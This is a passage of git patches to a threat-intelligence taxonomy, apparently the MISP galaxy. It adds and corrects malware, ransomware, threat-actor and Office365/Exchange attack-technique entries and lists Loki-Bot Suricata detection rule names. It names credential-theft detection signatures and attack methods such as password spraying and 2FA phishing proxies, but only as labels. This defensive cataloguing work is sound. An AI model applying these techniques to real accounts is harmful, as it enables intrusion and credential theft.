Loki-Bot\r\n0x0F\tUpgrade Loki-Bot\r\n0x10\tChange C2 Polling Frequency\r\n0x11\tDelete Executables & Exit\r\n\r\nSuricata Signatures\r\nRULE SID\tRULE NAME\r\n2024311\tET TROJAN Loki Bot Cryptocurrency Wallet Exfiltration Detected\r\n2024312\tET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M1\r\n2024313\tET TROJAN Loki Bot Request for C2 Commands Detected M1\r\n2024314\tET TROJAN Loki Bot File Exfiltration Detected\r\n2024315\tET TROJAN Loki Bot Keylogger Data Exfiltration Detected M1\r\n2024316\tET TROJAN Loki Bot Screenshot Exfiltration Detected\r\n2024317\tET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M2\r\n2024318\tET TROJAN Loki Bot Request for C2 Commands Detected M2\r\n2024319\tET TROJAN Loki Bot Keylogger Data Exfiltration Detected M2", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.lokipws", @@ -15962,7 +15962,7 @@ "synonyms": [], "type": [] }, - "uuid": "", + "uuid": "1628467f-cad5-453c-a5da-a4f543747d58", "value": "win.spynet_rat" }, { @@ -17152,7 +17152,7 @@ "synonyms": [], "type": [] }, - "uuid": "", + "uuid": "29e32ea9-8e10-4c50-a4dc-1642066a3df2", "value": "win.unidentified_005" }, { @@ -18429,7 +18429,7 @@ "value": "X-Tunnel (.NET)" }, { - "description": "In March 2019, AT&T Alien Labs identified a new malware family that is actively scanning for exposed web services and default passwords. Based on our findings we are calling it \u201cXwo\u201d - taken from its primary module name. It is likely related to the previously reported malware families Xbash and MongoLock.", + "description": "In March 2019, AT&T Alien Labs identified a new malware family that is actively scanning for exposed web services and default passwords. Based on our findings we are calling it “Xwo” - taken from its primary module name. It is likely related to the previously reported malware families Xbash and MongoLock.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.xwo", From b77087d59ee6698a82ed84007c1a3add0430b0e3 Mon Sep 17 00:00:00 2001 From: Alexandre Dulaunoy Date: Thu, 2 May 2019 14:48:17 +0200 Subject: [PATCH 29/50] chg: [malpedia] duplicates fixed --- clusters/malpedia.json | 1 - 1 file changed, 1 deletion(-) diff --git a/clusters/malpedia.json b/clusters/malpedia.json index c2c2e22..b1d9f45 100644 --- a/clusters/malpedia.json +++ b/clusters/malpedia.json @@ -10381,7 +10381,6 @@ "description": "KleptoParasite Stealer is advertised on Hackforums as a noob-friendly stealer. It is modular and comes with a IP retriever module, a Outlook stealer (32bit/64bit) and a Chrome/Firefox stealer (32bit/64bit). Earlier versions come bundled (loader plus modules), newer versions come with a loader (167k) that grabs the modules.\r\n\r\nPDB-strings suggest a relationship to JogLog v6 and v7.", "meta": { "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.kleptoparasite_stealer", "https://malpedia.caad.fkie.fraunhofer.de/details/win.kleptoparasite_stealer" ], "synonyms": [ From 7e329855b2e8815070269d72d9789ca4c71728fe Mon Sep 17 00:00:00 2001 From: StefanKelm Date: Thu, 2 May 2019 15:34:19 +0200 Subject: [PATCH 30/50] Update threat-actor.json Silent Librarian / COBALT DICKENS --- clusters/threat-actor.json | 18 +++++++++++++++++- 1 file changed, 17 insertions(+), 1 deletion(-) diff --git a/clusters/threat-actor.json b/clusters/threat-actor.json index 7e79a6e..b7227e9 100644 --- a/clusters/threat-actor.json +++ b/clusters/threat-actor.json @@ -6694,7 +6694,23 @@ }, "uuid": "ce7bba52-5ae8-44ea-9979-68502d832ab7", "value": "Sea Turtle" + }, + { + "description": "Last Friday, Deputy Attorney General Rod Rosenstein announced the indictment of nine Iranians who worked for an organization named the Mabna Institute. According to prosecutors, the defendants stole more than 31 terabytes of data from universities, companies, and government agencies around the world. The cost to the universities alone reportedly amounted to approximately $3.4 billion. The information stolen from these universities was used by the Islamic Revolutionary Guard Corps (IRGC) or sold for profit inside Iran. PhishLabs has been tracking this same threat group since late-2017, designating them Silent Librarian. Since discovery, we have been working with the FBI, ISAC partners, and other international law enforcement agencies to help understand and mitigate these attacks.", + "meta": { + "refs": [ + "https://info.phishlabs.com/blog/silent-librarian-more-to-the-story-of-the-iranian-mabna-institute-indictment", + "https://info.phishlabs.com/blog/silent-librarian-university-attacks-continue-unabated-in-days-following-indictment", + "https://www.justice.gov/usao-sdny/pr/nine-iranians-charged-conducting-massive-cyber-theft-campaign-behalf-islamic", + "https://www.secureworks.com/blog/back-to-school-cobalt-dickens-targets-universities" + ], + "synonyms": [ + "COBALT DICKENS" + ] + }, + "uuid": "5059b44d-2753-4977-b987-4922f09afe6b", + "value": "Silent Librarian" } ], - "version": 108 + "version": 109 } From ad00477c875584a7a6652159cd681b6e87c5c4cd Mon Sep 17 00:00:00 2001 From: Deborah Servili Date: Fri, 3 May 2019 15:55:19 +0200 Subject: [PATCH 31/50] add Scarnos --- clusters/tool.json | 13 ++++++++++++- 1 file changed, 12 insertions(+), 1 deletion(-) diff --git a/clusters/tool.json b/clusters/tool.json index 9fb9806..b15a64f 100644 --- a/clusters/tool.json +++ b/clusters/tool.json @@ -7670,7 +7670,18 @@ }, "uuid": "d8de6b56-9950-4389-83b8-4fc3262dc4c9", "value": "JasperLoader" + }, + { + "description": "The malware Scranos infects with rootkit capabilities, burying deep into vulnerable Windows computers to gain persistent access — even after the computer restarts. Scranos only emerged in recent months, according to Bitdefender with new research out Tuesday, but the number of its infections has rocketed in the months since it was first identified in November.", + "meta": { + "refs": [ + "https://labs.bitdefender.com/2019/04/inside-scranos-a-cross-platform-rootkit-enabled-spyware-operation/", + "https://techcrunch.com/2019/04/16/scranos-rootkit-passwords-payments/?guccounter=1&guce_referrer_us=aHR0cHM6Ly93d3cuZ29vZ2xlLmNvbS8&guce_referrer_cs=MrGSn18TmNoWovpLbekFYA" + ] + }, + "uuid": "5f0f6af2-b644-49a6-8f68-5d4ca58c989e", + "value": "Scranos" } ], - "version": 119 + "version": 120 } From 988586fde0ee119cb0629e5155ceb9437a48f65b Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Rapha=C3=ABl=20Vinot?= Date: Mon, 6 May 2019 17:17:16 +0200 Subject: [PATCH 32/50] fix: Duplicate values, typos. --- clusters/attck4fraud.json | 25 +++---------------- ...mitre-enterprise-attack-intrusion-set.json | 2 +- clusters/mitre-intrusion-set.json | 2 +- .../mitre-mobile-attack-intrusion-set.json | 2 +- clusters/mitre-pre-attack-intrusion-set.json | 2 +- clusters/sector.json | 4 --- clusters/threat-actor.json | 2 +- ...mitre-enterprise-attack-intrusion-set.json | 2 +- 8 files changed, 9 insertions(+), 32 deletions(-) diff --git a/clusters/attck4fraud.json b/clusters/attck4fraud.json index 1b9a4b0..47098d7 100644 --- a/clusters/attck4fraud.json +++ b/clusters/attck4fraud.json @@ -168,16 +168,6 @@ "uuid": "6bec22cb-9aed-426a-bffc-b0a78db6527a", "value": "ATM Black Box Attack" }, - { - "description": "Account-Checking Services", - "meta": { - "kill_chain": [ - "fraud-tactics:Target Compromise" - ] - }, - "uuid": "824bccd3-9dea-4579-8642-8dd15afcfacc", - "value": "Account-Checking Services" - }, { "description": "Insider Trading", "meta": { @@ -272,7 +262,8 @@ "description": "Fund Transfer", "meta": { "kill_chain": [ - "fraud-tactics:Assets Transfer" + "fraud-tactics:Assets Transfer", + "fraud-tactics:Monetisation" ] }, "uuid": "72ffa97e-d128-4c41-b323-0297b43d8a1b", @@ -308,16 +299,6 @@ "uuid": "f1243265-d50a-42fb-a83c-4696f95636e9", "value": "Money Mules" }, - { - "description": "Fund Transfer", - "meta": { - "kill_chain": [ - "fraud-tactics:Monetisation" - ] - }, - "uuid": "a8913af2-8f22-44b2-b6bc-32b7489d8f96", - "value": "Fund Transfer" - }, { "description": "Prepaid Cards", "meta": { @@ -349,5 +330,5 @@ "value": "ATM Explosive Attack" } ], - "version": 1 + "version": 2 } diff --git a/clusters/mitre-enterprise-attack-intrusion-set.json b/clusters/mitre-enterprise-attack-intrusion-set.json index 5c206c3..ad15c6c 100644 --- a/clusters/mitre-enterprise-attack-intrusion-set.json +++ b/clusters/mitre-enterprise-attack-intrusion-set.json @@ -4,7 +4,7 @@ ], "category": "actor", "description": "Name of ATT&CK Group", - "name": "Enterprise Attack -intrusion Set", + "name": "Enterprise Attack - Intrusion Set", "source": "https://github.com/mitre/cti", "type": "mitre-enterprise-attack-intrusion-set", "uuid": "01f18402-1708-11e8-ac1c-1ffb3c4a7775", diff --git a/clusters/mitre-intrusion-set.json b/clusters/mitre-intrusion-set.json index c68b99f..0520025 100644 --- a/clusters/mitre-intrusion-set.json +++ b/clusters/mitre-intrusion-set.json @@ -4,7 +4,7 @@ ], "category": "actor", "description": "Name of ATT&CK Group", - "name": "intrusion Set", + "name": "Intrusion Set", "source": "https://github.com/mitre/cti", "type": "mitre-intrusion-set", "uuid": "10df003c-7831-11e7-bdb9-971cdd1218df", diff --git a/clusters/mitre-mobile-attack-intrusion-set.json b/clusters/mitre-mobile-attack-intrusion-set.json index 4f52b18..3a712b2 100644 --- a/clusters/mitre-mobile-attack-intrusion-set.json +++ b/clusters/mitre-mobile-attack-intrusion-set.json @@ -4,7 +4,7 @@ ], "category": "actor", "description": "Name of ATT&CK Group", - "name": "Mobile Attack - intrusion Set", + "name": "Mobile Attack - Intrusion Set", "source": "https://github.com/mitre/cti", "type": "mitre-mobile-attack-intrusion-set", "uuid": "02ab4018-1708-11e8-8f9d-e735aabdfa53", diff --git a/clusters/mitre-pre-attack-intrusion-set.json b/clusters/mitre-pre-attack-intrusion-set.json index ba875c6..7c69222 100644 --- a/clusters/mitre-pre-attack-intrusion-set.json +++ b/clusters/mitre-pre-attack-intrusion-set.json @@ -4,7 +4,7 @@ ], "category": "actor", "description": "Name of ATT&CK Group", - "name": "Pre Attack - intrusion Set", + "name": "Pre Attack - Intrusion Set", "source": "https://github.com/mitre/cti", "type": "mitre-pre-attack-intrusion-set", "uuid": "1fdc8fa2-1708-11e8-99a3-67b4efc13c4f", diff --git a/clusters/sector.json b/clusters/sector.json index 97ffeba..1248a6c 100644 --- a/clusters/sector.json +++ b/clusters/sector.json @@ -305,10 +305,6 @@ "uuid": "a26ae91b-df10-4c6f-b7bc-14c7ba13f21d", "value": "Retail" }, - { - "uuid": "6ce2374c-2c81-4298-a941-666bf4258c00", - "value": "Retail" - }, { "uuid": "ff403f0f-67d0-494c-aff9-1d748b7e7d8d", "value": "Technology" diff --git a/clusters/threat-actor.json b/clusters/threat-actor.json index b7227e9..25e623b 100644 --- a/clusters/threat-actor.json +++ b/clusters/threat-actor.json @@ -8,7 +8,7 @@ ], "category": "actor", "description": "Known or estimated adversary groups targeting organizations and employees. Adversary groups are regularly confused with their initial operation or campaign.", - "name": "Threat actor", + "name": "Threat Actor", "source": "MISP Project", "type": "threat-actor", "uuid": "7cdff317-a673-4474-84ec-4f1754947823", diff --git a/galaxies/mitre-enterprise-attack-intrusion-set.json b/galaxies/mitre-enterprise-attack-intrusion-set.json index 538fb0e..3bd646a 100644 --- a/galaxies/mitre-enterprise-attack-intrusion-set.json +++ b/galaxies/mitre-enterprise-attack-intrusion-set.json @@ -1,7 +1,7 @@ { "description": "Name of ATT&CK Group", "icon": "user-secret", - "name": "Enterprise Attack -Intrusion Set", + "name": "Enterprise Attack - Intrusion Set", "namespace": "deprecated", "type": "mitre-enterprise-attack-intrusion-set", "uuid": "1f3b8c56-1708-11e8-b211-17a60c0f73ee", From 82ebbc6612929e088a70d1cf12fa701d53ef7bf2 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Rapha=C3=ABl=20Vinot?= Date: Tue, 7 May 2019 12:09:39 +0200 Subject: [PATCH 33/50] fix: UUID issues --- clusters/android.json | 6 +++--- clusters/malpedia.json | 42 ++++++++++++++++++++-------------------- clusters/ransomware.json | 6 +++--- clusters/sector.json | 4 ++-- clusters/tool.json | 6 +++--- 5 files changed, 32 insertions(+), 32 deletions(-) diff --git a/clusters/android.json b/clusters/android.json index 40ae255..c8b24bb 100644 --- a/clusters/android.json +++ b/clusters/android.json @@ -4497,7 +4497,7 @@ "https://source.android.com/security/reports/Google_Android_Security_2017_Report_Final.pdf" ] }, - "uuid": "2c75b006-2d18-11e8-8f57-2714f7737ec5 ", + "uuid": "2c75b006-2d18-11e8-8f57-2714f7737ec5", "value": "BreadSMS" }, { @@ -4569,7 +4569,7 @@ "https://researchcenter.paloaltonetworks.com/2018/04/unit42-henbox-inside-coop/" ] }, - "uuid": "72c37e24-4ead-11e8-8f08-db3ec8f8db86§", + "uuid": "72c37e24-4ead-11e8-8f08-db3ec8f8db86", "value": "HenBox" }, { @@ -4655,5 +4655,5 @@ "value": "Razdel" } ], - "version": 19 + "version": 20 } diff --git a/clusters/malpedia.json b/clusters/malpedia.json index b1d9f45..53d27c7 100644 --- a/clusters/malpedia.json +++ b/clusters/malpedia.json @@ -1315,7 +1315,7 @@ "synonyms": [], "type": [] }, - "uuid": "8a42a699-1746-498b-a558-e7113bb916c0", + "uuid": "8196b6f6-386e-4499-b269-4e5c65f74141", "value": "Cpuminer (ELF)" }, { @@ -1977,7 +1977,7 @@ ], "type": [] }, - "uuid": "0a7d9d22-a26d-4a2b-ab9b-b296176c3ecf", + "uuid": "a8404a31-968a-47e8-8434-533ceaf84c1f", "value": "X-Agent (ELF)" }, { @@ -2063,7 +2063,7 @@ "synonyms": [], "type": [] }, - "uuid": "8269e779-db23-4c94-aafb-36ee94879417", + "uuid": "f7c1675f-b38a-4511-9ac4-6e475b3815e6", "value": "DualToy (iOS)" }, { @@ -2089,7 +2089,7 @@ "synonyms": [], "type": [] }, - "uuid": "bc32df24-8e80-44bc-80b0-6a4d55661aa5", + "uuid": "bb340271-023c-4283-9d22-123317824a11", "value": "WireLurker (iOS)" }, { @@ -2674,7 +2674,7 @@ "synonyms": [], "type": [] }, - "uuid": "4b2ab902-811e-4b50-8510-43454d77d027", + "uuid": "2bb6c494-8057-4d83-9202-fda3284deee4", "value": "Crisis (OS X)" }, { @@ -3018,7 +3018,7 @@ "synonyms": [], "type": [] }, - "uuid": "6d5a5357-4126-4950-b8c3-ee78b1172217", + "uuid": "bfbb6e5a-32dc-4842-936c-5d8497570c74", "value": "Mokes (OS X)" }, { @@ -3200,7 +3200,7 @@ "synonyms": [], "type": [] }, - "uuid": "d674ffd2-1f27-403b-8fe9-b4af6e303e5c", + "uuid": "13173d75-45f0-4183-8e18-554a5781405c", "value": "Uroburos (OS X)" }, { @@ -3230,7 +3230,7 @@ "synonyms": [], "type": [] }, - "uuid": "7f8166e2-c7f4-4b48-a07b-681b61a8f2c1", + "uuid": "5aede44b-1a30-4062-bb97-ac9f4985ddb6", "value": "Winnti (OS X)" }, { @@ -3258,7 +3258,7 @@ "synonyms": [], "type": [] }, - "uuid": "47a8fedb-fd60-493a-9b7d-082bdb85621e", + "uuid": "f99ef0dc-9e96-42e0-bbfe-3616b3786629", "value": "Wirenet (OS X)" }, { @@ -3273,7 +3273,7 @@ "synonyms": [], "type": [] }, - "uuid": "0a7d9d22-a26d-4a2b-ab9b-b296176c3ecf", + "uuid": "858f4396-8bc9-4df8-9370-490bbb3b4535", "value": "X-Agent (OS X)" }, { @@ -3660,7 +3660,7 @@ "synonyms": [], "type": [] }, - "uuid": "4305d59a-0d07-4021-a902-e7996378898b", + "uuid": "9f85f4fc-1cce-4557-b3d8-b9ef522fafb2", "value": "FlexiSpy (symbian)" }, { @@ -4708,7 +4708,7 @@ "synonyms": [], "type": [] }, - "uuid": "4038c3bc-b559-45bb-bac1-9665a54dedf9", + "uuid": "b420eb9f-d526-473c-95ab-5ab380bbec72", "value": "Bahamut (Windows)" }, { @@ -7360,7 +7360,7 @@ "synonyms": [], "type": [] }, - "uuid": "8269e779-db23-4c94-aafb-36ee94879417", + "uuid": "440daef1-385d-42fd-a714-462590d4ce6b", "value": "DualToy (Windows)" }, { @@ -7675,7 +7675,7 @@ "synonyms": [], "type": [] }, - "uuid": "479353aa-c6d7-47a7-b5f0-3f97fd904864", + "uuid": "06450729-fe60-4348-9717-c13a487738b9", "value": "Erebus (Windows)" }, { @@ -8257,7 +8257,7 @@ "synonyms": [], "type": [] }, - "uuid": "4305d59a-0d07-4021-a902-e7996378898b", + "uuid": "2431a1e5-4e64-454a-94c8-8a95f88d2d4a", "value": "FlexiSpy (Windows)" }, { @@ -10737,7 +10737,7 @@ "synonyms": [], "type": [] }, - "uuid": "0caf0292-b01a-4439-b56f-c75b71900bc0", + "uuid": "eead20f5-6a30-4700-8d14-cfb2d42eaff0", "value": "Lazarus (Windows)" }, { @@ -11682,7 +11682,7 @@ "synonyms": [], "type": [] }, - "uuid": "17e12216-a303-4a00-8283-d3fe92d0934c", + "uuid": "2edd3051-b1b5-47f2-9155-8c97f791dfb7", "value": "Mirai (Windows)" }, { @@ -11805,7 +11805,7 @@ "synonyms": [], "type": [] }, - "uuid": "6d5a5357-4126-4950-b8c3-ee78b1172217", + "uuid": "3a711d44-2a70-418d-92c1-692c3d3b13c2", "value": "Mokes (Windows)" }, { @@ -14395,7 +14395,7 @@ ], "type": [] }, - "uuid": "22ef1e56-7778-41d1-9b2b-737aa5bf9777", + "uuid": "96bf1b6d-28e1-4dd9-aabe-23050138bc39", "value": "Retefe (Windows)" }, { @@ -18304,7 +18304,7 @@ ], "type": [] }, - "uuid": "0a7d9d22-a26d-4a2b-ab9b-b296176c3ecf", + "uuid": "e8b38fbd-a7ce-4073-a660-44dfabc1b678", "value": "X-Agent (Windows)" }, { @@ -18799,5 +18799,5 @@ "value": "Zyklon" } ], - "version": 2559 + "version": 2560 } diff --git a/clusters/ransomware.json b/clusters/ransomware.json index 157cf4c..558bc6a 100644 --- a/clusters/ransomware.json +++ b/clusters/ransomware.json @@ -11863,7 +11863,7 @@ "http://id-ransomware.blogspot.com/2018/06/pedcont-ransomware.html" ] }, - "uuid": "b0e074fc-6e45-11e8-8366-dbfc88552a23 ", + "uuid": "b0e074fc-6e45-11e8-8366-dbfc88552a23", "value": "Pedcont" }, { @@ -12539,7 +12539,7 @@ "Ransomware God Crypt" ] }, - "uuid": "7074f228-e0ee-11e8-9c49-7fc798e92ddbx§", + "uuid": "1b74bfda-c32c-4713-8ff6-793d8e787645", "value": "God Crypt Joke Ransomware" }, { @@ -13141,5 +13141,5 @@ "value": "Cr1ptT0r" } ], - "version": 60 + "version": 61 } diff --git a/clusters/sector.json b/clusters/sector.json index 1248a6c..993867e 100644 --- a/clusters/sector.json +++ b/clusters/sector.json @@ -7,7 +7,7 @@ "name": "Sector", "source": "CERT-EU", "type": "sector", - "uuid": "141deecc-ae4e-11e7-8dfe-f3397ba8cc8", + "uuid": "1401c704-7dfb-41f6-a6d3-e751b270843b", "values": [ { "uuid": "3ff4e243-7e26-4535-b911-fdda2f724aa2", @@ -478,5 +478,5 @@ "value": "Immigration" } ], - "version": 3 + "version": 4 } diff --git a/clusters/tool.json b/clusters/tool.json index b15a64f..bbf8b5c 100644 --- a/clusters/tool.json +++ b/clusters/tool.json @@ -6469,7 +6469,7 @@ "type": "similar" } ], - "uuid": "3784c74-691a-4110-94f6-66e60224aa92", + "uuid": "203fd529-6382-417e-a68f-7565fbf89ece", "value": "SHARPKNOT" }, { @@ -6682,7 +6682,7 @@ "https://www.intezer.com/iron-cybercrime-group-under-the-scope-2/" ] }, - "uuid": "1740ec4-d730-40d6-a3b8-32d5fe7f21cf", + "uuid": "5433edec-f1c3-4051-a3cc-c7f9fc8972ee", "value": "Iron Backdoor" }, { @@ -7683,5 +7683,5 @@ "value": "Scranos" } ], - "version": 120 + "version": 121 } From 5bbb0ab53d4c2b97d63bcad479bb7cdcd55b59c2 Mon Sep 17 00:00:00 2001 From: Deborah Servili Date: Wed, 8 May 2019 15:54:37 +0200 Subject: [PATCH 34/50] add Sodinokibi --- clusters/ransomware.json | 12 +++++++++++- 1 file changed, 11 insertions(+), 1 deletion(-) diff --git a/clusters/ransomware.json b/clusters/ransomware.json index 558bc6a..345a723 100644 --- a/clusters/ransomware.json +++ b/clusters/ransomware.json @@ -13139,7 +13139,17 @@ }, "uuid": "8cfa554a-1e1b-328a-606f-026d771870b1", "value": "Cr1ptT0r" + }, + { + "description": "Attackers are actively exploiting a recently disclosed vulnerability in Oracle WebLogic to install a new variant of ransomware called \"Sodinokibi.\" Sodinokibi attempts to encrypt data in a user's directory and delete shadow copy backups to make data recovery more difficult. Oracle first patched the issue on April 26, outside of their normal patch cycle, and assigned it CVE-2019-2725. This vulnerability is easy for attackers to exploit, as anyone with HTTP access to the WebLogic server could carry out an attack. Because of this, the bug has a CVSS score of 9.8/10. Attackers have been making use of this exploit in the wild since at least April 17. Cisco's Incident Response (IR) team, along with Cisco Talos, are actively investigating these attacks and Sodinokibi.", + "meta": { + "refs": [ + "https://blog.talosintelligence.com/2019/04/sodinokibi-ransomware-exploits-weblogic.html" + ] + }, + "uuid": "24bd9a4b-2b66-428b-8e1c-6b280b056c00", + "value": "Sodinokibi" } ], - "version": 61 + "version": 62 } From 7c0ea4949a4f8dd6f83d0ceeef0650c9297aa50f Mon Sep 17 00:00:00 2001 From: Rony <49360849+r0ny123@users.noreply.github.com> Date: Sun, 12 May 2019 11:11:09 +0530 Subject: [PATCH 35/50] Update threat-actor.json --- clusters/threat-actor.json | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/clusters/threat-actor.json b/clusters/threat-actor.json index 25e623b..99b0e6f 100644 --- a/clusters/threat-actor.json +++ b/clusters/threat-actor.json @@ -1709,13 +1709,12 @@ "refs": [ "https://en.wikipedia.org/wiki/Operation_Newscaster", "https://iranthreats.github.io/resources/macdownloader-macos-malware/", - "https://www.isightpartners.com/2014/05/newscaster-iranian-threat-inside-social-media/", + "https://paper.seebug.org/papers/APT/APT_CyberCriminal_Campagin/2014/2014.05.28.NewsCaster_An_Iranian_Threat_Within_Social_Networks/file-2581720763-pdf.pdf", "https://www.forbes.com/sites/thomasbrewster/2017/07/27/iran-hackers-oilrig-use-fake-personas-on-facebook-linkedin-for-cyberespionage/", "https://cryptome.org/2012/11/parastoo-hacks-iaea.htm", "https://securelist.com/files/2017/03/Report_Shamoon_StoneDrill_final.pdf", "https://securelist.com/blog/software/74503/freezer-paper-around-free-meat/", "https://www.verfassungsschutz.de/download/broschuere-2016-10-bfv-cyber-brief-2016-04.pdf", - "https://github.com/gasgas4/APT_CyberCriminal_Campagin/tree/master/2014/2014.05.28.NewsCaster_An_Iranian_Threat_Within_Social_Networks", "https://www.cfr.org/interactive/cyber-operations/newscaster" ], "synonyms": [ From a2df5c46d8452ad295e257e38f59777052878933 Mon Sep 17 00:00:00 2001 From: Alexandre Dulaunoy Date: Sun, 12 May 2019 09:51:41 +0200 Subject: [PATCH 36/50] chg: [o365-exchange-techniques] [WiP] based on John Lambert matrix techniques --- clusters/o365-exchange-techniques.json | 115 +++++++++++++++++++++++++ galaxies/o365-exchange-techniques.json | 18 ++++ 2 files changed, 133 insertions(+) create mode 100644 clusters/o365-exchange-techniques.json create mode 100644 galaxies/o365-exchange-techniques.json diff --git a/clusters/o365-exchange-techniques.json b/clusters/o365-exchange-techniques.json new file mode 100644 index 0000000..a79baa8 --- /dev/null +++ b/clusters/o365-exchange-techniques.json @@ -0,0 +1,115 @@ +{ + "authors": [ + "John Lambert", + "Alexandre Dulaunoy" + ], + "category": "guidelines", + "description": "o365-exchange-techniques - Office365/Exchange related techniques by @johnLaT", + "name": "o365-exchange-techniques", + "source": "Open Sources", + "type": "cloud-security", + "uuid": "44574c7e-b732-4466-a7be-ef363374013a", + "values": [ + { + "description": "AAD - Dump users and groups with Azure AD", + "meta": { + "kill_chain": [ + "tactics:Recon" + ] + }, + "uuid": "fab70361-329a-410a-9dc4-831ecd8df39f", + "value": "AAD - Dump users and groups with Azure AD" + }, + { + "description": "O365 - Get Global Address List: MailSniper", + "meta": { + "kill_chain": [ + "tactics:Recon" + ] + }, + "uuid": "21833216-1b8a-43a9-b51e-500c67a900a8", + "value": "O365 - Get Global Address List: MailSniper" + }, + { + "description": "O365 - Find Open Mailboxes: MailSniper", + "meta": { + "kill_chain": [ + "tactics:Recon" + ] + }, + "uuid": "9e3af2e1-90a6-4d69-ba82-cb0c99401713", + "value": "O365 - Find Open Mailboxes: MailSniper" + }, + { + "description": "O365 - User account enumeration with ActiveSync", + "meta": { + "kill_chain": [ + "tactics:Recon" + ] + }, + "uuid": "53361eef-39b0-4c46-a009-0b4e3a0e286a", + "value": "O365 - User account enumeration with ActiveSync" + }, + { + "description": "End Point - Search host for Azure Credentials: SharpCloud", + "meta": { + "kill_chain": [ + "tactics:Recon" + ] + }, + "uuid": "5c0c2b04-77e5-4f50-a0b8-206d7cc9946a", + "value": "End Point - Search host for Azure Credentials: SharpCloud" + }, + { + "description": "On-Prem Exchange - Portal Recon", + "meta": { + "kill_chain": [ + "tactics:Recon" + ] + }, + "uuid": "2cd547bf-b093-4dab-b9e5-5172049cbc0d", + "value": "On-Prem Exchange - Portal Recon" + }, + { + "description": "On-Prem Exchange - Enumerate domain accounts: using Skype4B", + "meta": { + "kill_chain": [ + "tactics:Recon" + ] + }, + "uuid": "651fdde4-09ed-48b7-9620-545d7dcec251", + "value": "On-Prem Exchange - Enumerate domain accounts: using Skype4B" + }, + { + "description": "On-Prem Exchange - Enumerate domain accounts: OWA & Exchange", + "meta": { + "kill_chain": [ + "tactics:Recon" + ] + }, + "uuid": "008c46de-4667-4e40-9bea-74e91b6587fd", + "value": "On-Prem Exchange - Enumerate domain accounts: OWA & Exchange" + }, + { + "description": "On-Prem Exchange - Enumerate domain accounts: FindPeople", + "meta": { + "kill_chain": [ + "tactics:Recon" + ] + }, + "uuid": "435e9319-88ed-4555-be84-a5322dc997a4", + "value": "On-Prem Exchange - Enumerate domain accounts: FindPeople" + }, + { + "description": "On-Prem Exchange - OWA version discovery", + "meta": { + "kill_chain": [ + "tactics:Recon" + ] + }, + "uuid": "f227caf6-9399-4ac3-bab4-010f66853abb", + "value": "On-Prem Exchange - OWA version discovery" + } + ], + "version": 1 +} diff --git a/galaxies/o365-exchange-techniques.json b/galaxies/o365-exchange-techniques.json new file mode 100644 index 0000000..204adf6 --- /dev/null +++ b/galaxies/o365-exchange-techniques.json @@ -0,0 +1,18 @@ +{ + "description": "o365-exchange-techniques - Office365/Exchange related techniques by @johnLaTwC", + "icon": "map", + "kill_chain_order": { + "tactics": [ + "Recon", + "Compromise", + "Persistence", + "Expansion", + "Actions on Intent" + ] + }, + "name": "o365-exchange-techniques", + "namespace": "misp", + "type": "cloud-security", + "uuid": "44574c7e-b732-4466-a7be-ef363374013a", + "version": 1 +} From 3a75c6a3dffa71903a84919edce6cc931a3c0ac4 Mon Sep 17 00:00:00 2001 From: Alexandre Dulaunoy Date: Sun, 12 May 2019 12:07:30 +0200 Subject: [PATCH 37/50] chg: [o365-exchange-techniques] Compromise row added (WiP) --- clusters/o365-exchange-techniques.json | 80 ++++++++++++++++++++++++++ 1 file changed, 80 insertions(+) diff --git a/clusters/o365-exchange-techniques.json b/clusters/o365-exchange-techniques.json index a79baa8..5dbe500 100644 --- a/clusters/o365-exchange-techniques.json +++ b/clusters/o365-exchange-techniques.json @@ -109,6 +109,86 @@ }, "uuid": "f227caf6-9399-4ac3-bab4-010f66853abb", "value": "On-Prem Exchange - OWA version discovery" + }, + { + "description": "AAD - Password Spray: MailSniper", + "meta": { + "kill_chain": [ + "tactics:Compromise" + ] + }, + "uuid": "933ec08d-a6d4-4ced-b732-4cb0331e7799", + "value": "AAD - Password Spray: MailSniper" + }, + { + "description": "AAD - Password Spray: CredKing", + "meta": { + "kill_chain": [ + "tactics:Compromise" + ] + }, + "uuid": "5670ca90-38cd-4825-bd83-1bdb31fd5ea3", + "value": "AAD - Password Spray: CredKing" + }, + { + "description": "O365 - Bruteforce of Autodiscover: SensePost Ruler", + "meta": { + "kill_chain": [ + "tactics:Compromise" + ] + }, + "uuid": "d66c1ead-4dd3-4968-b6fe-faf41b7fb88d", + "value": "O365 - Bruteforce of Autodiscover: SensePost Ruler" + }, + { + "description": "O365 - Phishing for credentials", + "meta": { + "kill_chain": [ + "tactics:Compromise" + ] + }, + "uuid": "eda57f15-029c-4465-9401-f9dafc6d366c", + "value": "O365 - Phishing for credentials" + }, + { + "description": "O365 - Phishing using OAuth app", + "meta": { + "kill_chain": [ + "tactics:Compromise" + ] + }, + "uuid": "61589df6-6848-4866-8613-8a4a7478abef", + "value": "O365 - Phishing using OAuth app" + }, + { + "description": "O365 - 2FA MITM Phishing: evilginx2", + "meta": { + "kill_chain": [ + "tactics:Compromise" + ] + }, + "uuid": "fa1087c8-012d-4ef6-9eb3-5b5a6fb94c02", + "value": "O365 - 2FA MITM Phishing: evilginx2" + }, + { + "description": "On-Prem Exchange - Password Spray using Invoke-PasswordSprayOWA, EWS", + "meta": { + "kill_chain": [ + "tactics:Compromise" + ] + }, + "uuid": "8ffe80b9-0213-40c6-aeca-8877bdca8741", + "value": "On-Prem Exchange - Password Spray using Invoke-PasswordSprayOWA, EWS" + }, + { + "description": "On-Prem Exchange - Bruteforce of Autodiscover: SensePost Ruler", + "meta": { + "kill_chain": [ + "tactics:Compromise" + ] + }, + "uuid": "cf8df948-0332-4ec7-94f3-3f6d54bbcbb9", + "value": "On-Prem Exchange - Bruteforce of Autodiscover: SensePost Ruler" } ], "version": 1 From ee0f793e49912c61f32cf8fb5d13eb6fbaf19307 Mon Sep 17 00:00:00 2001 From: Alexandre Dulaunoy Date: Sun, 12 May 2019 17:54:53 +0200 Subject: [PATCH 38/50] chg: [o365-exchange-techniques] Persistence kill-chain added (WiP) --- clusters/o365-exchange-techniques.json | 60 ++++++++++++++++++++++++++ 1 file changed, 60 insertions(+) diff --git a/clusters/o365-exchange-techniques.json 